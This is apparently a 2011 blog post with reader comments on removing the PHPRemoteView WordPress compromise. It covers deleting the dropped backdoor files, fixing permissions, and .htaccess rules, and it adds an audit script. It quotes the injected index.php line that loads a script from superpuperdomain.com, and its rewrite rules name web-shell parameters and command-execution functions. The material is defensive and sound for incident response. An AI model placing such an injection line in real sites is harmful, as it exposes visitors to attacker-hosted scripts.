PHPRemoteView Hack: What it is, and how to remove it

Aug 7, 2011 by

[Image: PHPRemoteView (image courtesy tbogard.com)]

What is the PHPRemoteView hack? It is a WordPress hack that begins with attackers gaining write access to your WordPress directory. I myself did not take a screenshot of it, but I was dumb enough to fall for it. It shows an HTTP-authentication-style prompt when you open the WordPress administration directory; entering your username and password then displays a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script), and I was susceptible because I had not updated my copy of timthumb.php.

I scoured the Internet and finally found a fix.

First, in your WordPress installation’s index.php (the one in the WordPress root, not the theme’s index.php), remove the following line, which the hack adds:

echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

(Note that the script could also be run from superpuperdomain2.com.)

Then remove six (check back often) phony files added by the hackers (back up first, in case your installation actually requires these files):

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php

Do not try to open any of these files, as my antivirus sounded alarms immediately.

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run these commands to set those permissions recursively for your WordPress installation (a plain chmod -R 0755 would set every file to 755 instead of 644):

find /wordpressdirectory -type d -exec chmod 755 {} \;
find /wordpressdirectory -type f -exec chmod 644 {} \;

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all

The malicious script was loaded from superpuperdomain.com (UPDATE: superpuperdomain2.com has popped up). I ran a traceroute on the domains and found their servers’ IP addresses. To be safe, I blocked the whole ranges those IPs fall in (91.220 and 91.196), so they receive a forbidden notice if they try to reach TechSpheria again. Bear in mind that these deny rules only affect requests those hosts make to your server; they do not stop your visitors’ browsers from loading the injected script, so removing the echo line from index.php is the essential step.
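A script that audits an installation for the indicators listed above, as an added example that is not part of the original post: it reports the known phony files, PHP files that still load count.php from either superpuperdomain domain, PHP files under wp-content/uploads (which never needs PHP), and files or directories off the 644/755 baseline. The function names and the summary format are my own assumptions.

```shell
#!/bin/sh
# Added audit helper, not from the original post (whose fix is manual). The
# phony file paths, the count.php script and the 644/755 baseline are the ones
# the post lists; the function names and summary format are assumptions of mine.
# Usage: . ./wp_audit.sh && audit_wp_dir /path/to/wordpress

# Phony files the hack drops, relative to the WordPress root.
PHONY_FILES="wp-admin/js/config.php wp-admin/common.php wp-admin/udp.php \
wp-content/udp.php wp-content/uploads/feed-file.php wp-content/uploads/feed-files.php"

# Domains the injected <script> tag loads count.php from.
INJECT_DOMAINS="superpuperdomain.com superpuperdomain2.com"

# Echo each known phony file that exists under WordPress root $1.
list_phony_files() {
  for f in $PHONY_FILES; do
    if [ -f "$1/$f" ]; then echo "$1/$f"; fi
  done
}

# Echo file:line:text for every PHP file under $1 that still loads count.php
# from one of the injection domains (the echo '<script ...>' line to remove).
list_injected_scripts() {
  for dom in $INJECT_DOMAINS; do
    find "$1" -type f -name '*.php' \
      -exec grep -HnF "http://$dom/count.php" {} + 2>/dev/null || true
  done
}

# Echo any PHP file under wp-content/uploads: WordPress never needs PHP there,
# and two of the phony files are dropped exactly there.
list_php_in_uploads() {
  [ -d "$1/wp-content/uploads" ] || return 0
  find "$1/wp-content/uploads" -type f -name '*.php' 2>/dev/null || true
}

# Echo every directory not at 755 and every file not at 644 (the post's baseline).
list_bad_perms() {
  find "$1" -type d ! -perm 755 2>/dev/null || true
  find "$1" -type f ! -perm 644 2>/dev/null || true
}

# Count lines on stdin without the leading spaces some wc builds print.
count_lines() { wc -l | tr -d ' '; }

# Run every check and echo one summary line, e.g. "phony=2 injected=1 uploads=1 perms=1".
audit_wp_dir() {
  p=$(list_phony_files "$1" | count_lines)
  i=$(list_injected_scripts "$1" | count_lines)
  u=$(list_php_in_uploads "$1" | count_lines)
  m=$(list_bad_perms "$1" | count_lines)
  echo "phony=$p injected=$i uploads=$u perms=$m"
}
```

Run the list_* functions individually to see the offending paths before deleting anything, and back up first as the post advises.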

Benoist Rousseau posted additional .htaccess rules that reject requests whose path or query string resembles a PHP web shell (phpremoteview, c99, r57, cmd= parameters and so on); use at your own risk:

# RewriteEngine On must appear once in the .htaccess; WordPress's own block usually has it already.
RewriteEngine On
RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
## WARNING: this rule can break your site (it rejects any query string containing cmd=). ##
## Apache does not allow a comment at the end of a directive line, so it sits on its own line. ##
RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR]
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) - [F]

Remember to keep your plugins and code updated, and use different passwords for all your sites; keeping a secure WordPress installation is vital to everything.

(via T. Bogard and Benoist Rousseau)

UPDATE 1:
Added /wp-content/udp.php to the list of malicious files.

UPDATE 2:
/wp-content/udp.php can also be located in /wp-admin/udp.php. Check both /wp-content/ and /wp-admin/ for udp.php.

UPDATE 3:
Both /wp-content/udp.php and /wp-admin/udp.php are present and malicious. Remove them both.

UPDATE 4:
Added two files: /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php to the list.

UPDATE 5:
Added 91.196 to the deny IP list since superpuperdomain2.com has popped up.

  • bill ballad

    I had the same thing hit my site yesterday. You may have missed a file: look for udp.php in wp-content; it’s a remote file upload script.

    • http://techspheria.com Dennis Fan

      Yes, thanks. I was unaware of its presence.

      And I was hit by it yesterday as well, only got around to writing about it today.

    • http://techspheria.com Dennis Fan

      Do you know if they collect usernames and passwords sent through their script?

      • debajyoti banerjee

        Better to change your MySQL database password and all other associated passwords. I have faced a similar phpRemoteView attack while using the “IGIT related post with thumb image after post” plugin, which uses an old ‘timthumb.php’ file vulnerable to this attack.

        • http://techspheria.com Dennis Fan

          Thank you. I already changed most of my significant passwords.

        • http://www.facebook.com/profile.php?id=1134455829 Andrew Wells Douglass

          I’m thinking IGIT is the culprit, too. Sent a note to the author. Version 3.9.7

          Any suggestions for alternative plugins? :)

      • bill ballad

        Looks like this was just phase one; right now I think they are just collecting attack metrics. Phase two will bring exploit packages if you didn’t clean your site. I think phase one was an automated worm.

        • http://techspheria.com Dennis Fan

          Thank you for sharing your thoughts. Mind if I include that in the article later? (with credit, of course)

  • Pingback: Ci hanno infettato il sito! | La Baia

  • Pingback: Wordpress Website Hacked with RemoteViewPHP

  • http://twitter.com/dirk_s dirk_s

    udp.php is also changed / added in /wp-admin/

    • http://techspheria.com Dennis Fan

      Thank you for that information. I will update the post now.

  • http://twitter.com/dirk_s dirk_s

    Quadro is a theme, that uses the timthumb.php …

  • Pingback: How to Check for PHP Remote View Hack | Empirical Integrated Marketing

  • Paul

    Thank you so much for the comprehensive fix. Do we need to remove timthumb.php? Is there an update available?

    • http://techspheria.com Dennis Fan

      Yes, there is an update available, no need to remove it.


  • Tina

    You’ve saved my life – thank you so much!

  • http://www.platformnation.com Steve519

    There were also two files that were uploaded to the upload folder. I forgot the names but they had either feed or rss in the title. Both within an hour of the other files being uploaded.

    • http://techspheria.com Dennis Fan

      /wp-content/feed-file.php and /wp-content/feed-files.php. Thank you. Added to the list, much appreciated!

  • http://twitter.com/beaubrk Beau Brooke

    I believe my site is infected by this too. I’ve checked my index.php but I don’t have the script above. I did however have some of the additional malicious files. Where should I be looking?

    I have updated my timthumb.php and removed what I can but I need to make sure it’s 100% removed.

  • http://twitter.com/beaubrk Beau Brooke

    Ignore me, I assumed this guide meant the index.php within the theme folder. I’ve found it now.

  • Tina

    I just found yet another file wp-content/78d69f40906679a976dc4d45cebffbe6.php

  • Pingback: Removing PHPRemoteView hack attack from your Wordpress

  • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

    Question! I had wp-admin/upd.php instead of udp.php. I deleted it; was this incorrect?

    • http://techspheria.com Dennis Fan

      I’m sorry, I’m not understanding what you’re saying.


      • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

        In my directory, I was not able to find (as mentioned above)

        /wp-admin/udp.php

        /wp-content/udp.php

        Instead, they were called /wp-admin/UPD.php (the difference is just the letter order). Do you think it will affect my website?

        • http://techspheria.com Dennis Fan

          Check the contents of the file. I doubt its legitimacy; however, make sure. If there are no comments indicating WordPress or a plugin, it’s probably malicious.

          • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

            Thanks a lot for your help, really appreciated!!

          • http://pulse.yahoo.com/_LASIK3PT7Z4QXQGTN4G4GZ3QYY Nayith

            As you said, they are illegitimate!

  • Admin

    There’s also a temp directory inside your theme template; delete that as well.

  • http://donotargue.com KillerSneak

    Sorry for the double post. The temp directory also hosts an altered .htaccess and the 78d69f40906679a976dc4d45cebffbe6.php numeric PHP files along with some fake index and other files; just delete the whole temp directory/folder.

  • http://twitter.com/rachelhonoway rachelhonoway

    Thanks for the help – MUCH appreciated! (BTW – We use the magnificent theme as well)

  • http://windsorite.ca Owen Christopher Wolter

    THANKS so much for this. windsorite.ca became infected; I don’t know when the last time was that I updated timthumb.

    Also, a recent ping of superpuperdomain2.com returns 91.196.XXX.XXX

    So in my htaccess I now have:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain2.com
    allow from all

  • carley

    Another big thank you for the post! Damn hackers!

  • Zack Proser

    Much appreciated!

  • Pingback: phpRemoteView Attack: Vulnerabilità in WordPress

  • http://www.epicinfo.net Matt C

    Awesome post. Just saved my ass. Thank you.

  • Adamfrm

    Thank you very much for this useful article. I also had this problem and I’ve run the appropriate commands from the article above, but I cannot find the files /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php. Can you help me?

    • http://techspheria.com Dennis Fan

      If those files are not there, you SHOULD be fine.

    • Anonymous

      I had the same issue with this hack, but thanks to this post I saved my websites. Adamfrm, I couldn’t find /feed-files.php and /feed-file.php either, but when I checked my sites on http://sitecheck.sucuri.net/scanner/ it didn’t show me that the sites were infected. Before that, I had checked them and it had shown me that my sites had been infected.

  • Nwill36

    Very useful information; one of my sites had been hacked, and it also got through crawltrack.
    Thanks for your quick help, I have secured other sites using WordPress.

  • http://lloydchiro.com LloydChiro

    Thanks for this. I had SOME of those files in my site, but not all. 

    I’m wondering if I need to wipe my site on my host and start clean, or will this be a permanent fix?

    • http://techspheria.com Dennis Fan

      You SHOULD be fine.


  • http://lloydchiro.com LloydChiro

    Oh, and I can’t figure out how I got this. Anybody know how this shows up?

    • http://techspheria.com Dennis Fan

      timthumb.php had a security exploit and that was used to infect your site.

      • http://lloydchiro.com LloydChiro

        Thanks. I actually just updated my timthumb.php file. The theme that I’m using is using version 1.4, and the latest version is up to 2.7. I would have never thought to update this on my own, as it’s not a plugin that I see on my dashboard.

  • Chris Miller

    Thanks for your help with this! Saved a site for us tonight! 

  • http://www.facebook.com/profile.php?id=1134455829 Andrew Wells Douglass

    I should have also said THANK YOU THANK YOU THANK YOU for a timely and lucid explanation of this problem. I suspect others are more grateful than it might seem. It’s like, if your doctor tells you that you have cancer, your first instinct may not be to send her a fruit basket….

  • Pre_existance

    THANK YOU SO MUCH FOR THIS… I’ve spent all day trying to figure this out and wasn’t understanding anything I was reading on other sites. This made perfect sense and actually WORKED!!! Hoorah!!

  • Pingback: Seu wordpress pode estar sendo hackeado pelo Superuperdomain: TimThumb e PHP Remote View Hack | [ Ferramentas Blog ]

  • Pingback: eBabble - Technology » TimThumb Vulnerability

  • Lauro Faria

    Apart from these files, I also found /wp-content/e334….php, /wp-config.php and /index.php, which had injected code.

    Lauro Faria, www.bdibbs.com.br

  • OceansDB

    My blog got hacked too. I filed a complaint at superpuperdomain.com’s registrar with some additional information and a virus report. I am very pleased to let y’all know the domain has been suspended :)

  • Pingback: Falha de segurança no Timthumb - BDI BBS

  • http://twitter.com/minimalis Seb

    Hi,

    Thanks for this great post. I got hacked by this crap as well. I deleted the files you mentioned above but I can’t find “the base code”.

    First, in your WordPress’s index.php, remove the following script added by the hack: echo ”;

    I can’t find this in my index.php. Do you have another idea?

    Regards

    • http://techspheria.com Dennis Fan

      Does your index.php look like a normal WordPress index?

      • http://twitter.com/minimalis Seb

        That is how it looks like http://dl.dropbox.com/u/1849289/index.php

        But if I check the sourcecode at http://willius-photography.de I can see the script.

        • http://techspheria.com Dennis Fan

          Clear any caching plugin you might have installed.

          • http://twitter.com/minimalis Seb

            Don’t have a caching plugin installed :-/

            • http://techspheria.com Dennis Fan

              Oh… Check the blog header file then? Maybe the hackers have evolved…

              • http://twitter.com/minimalis Seb

                Thanks a bunch for your quick answers, Dennis. I searched index.php, header and footer for “superpuperdomain” but I can’t find anything. It’s weird.

                • http://techspheria.com Dennis Fan

                  Try clearing your cache?

                  • http://twitter.com/minimalis Seb

                    Done. Still in the sourcecode. 


                • http://techspheria.com Dennis Fan

                  *Your browser cache.

        • http://techspheria.com Dennis Fan

          Hello, I just checked your site’s source and did not manage to find superpuperdomain…

          • http://twitter.com/minimalis Seb

            Chrome shows it and a huge malware warning pops up if you try to reach the site :-/

            • http://techspheria.com Dennis Fan

              I have no idea what could be causing this, I suggest you wait for a day, and see if it is still there. If so, there are more extreme ways of fixing this.

  • Pingback: Malware Attacke Superpuperdomain2.com | FOTOPRESSO

  • Beej

    I have the same thing as Seb. My site’s source code (newyoungelite.com) has this on line 669. I don’t know how to change it.

    • beej

      fixed

      • Robbie

        how did you fix it?

  • Pingback: Webseite gehackt. Kontrolliert eure Wordpress Installation. : swblog

  • http://www.pixel2pixeldesign.com Pixel2Pixel Design

    Refer to this article; it is a good one for removing this virus: http://www.pixel2pixeldesign.com/phpremoteview-hack-superpuperdomaincom-remove/

  • Blaise

    Thanks. Really. You saved my blog.

  • http://gaut.am/ Gautam

    I’ve removed the code from wp-config.php and also deleted the upd.php file from wp-content. But still, when I browse any site, it seems to crash the whole server. I have 4 WP sites running under 3 users on a Dreamhost VPS. I’ve cleaned them all against codes, timthumb (it is there on one site, but that is the latest version with allow external deactivated), files etc. and also added the htaccess codes (both of those in the same file, above the domain directory).

  • http://donotargue.com KillerSneak

    Anybody having issues with “counter-wordpress.com”? My site has been flagged by Chrome now and it leads to the same “Welcome to nginx!” that the timthumb hack had. Can someone help me, as I can’t find where it’s coming from?

  • Pingback: Hacked And Had | Micah

  • JustMe

    I cleared one of my sites from this hack, but now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru….

    It seems to be a lot more difficult to resolve :-(

    Anyone else got probs with downloading plugins through the backend? Like getting redirected to Google, or the malware message from Google?
    Could you please check this out, techspheria? Maybe you will find a solution before all the WordPress installations get this issue….

  • JustMe

    Found it: my .htaccess file had a few hidden lines that linked to http:*//distributioncorporate*.ru/kloac/index.php. I deleted my .htaccess file and made a new one. These hackers also place phony files in your WordPress installation. Check your uploads directory and theme files for sm3.php and other files you don’t recognize.

  • Pingback: Drabbad av Pharma Hack… @ Who Cut The Cheeze

  • Deirdorf

    Thanks for the help!!! 

    I would have found this post sooner if it had shown up in my initial search for “Exploit:JS/Timbum.B”.

    It would help if you added Exploit:JS/Timbum.B, since that is how the malware is referenced.

  • http://www.justinwheeler.net Justin Wheeler

    Thanks very much!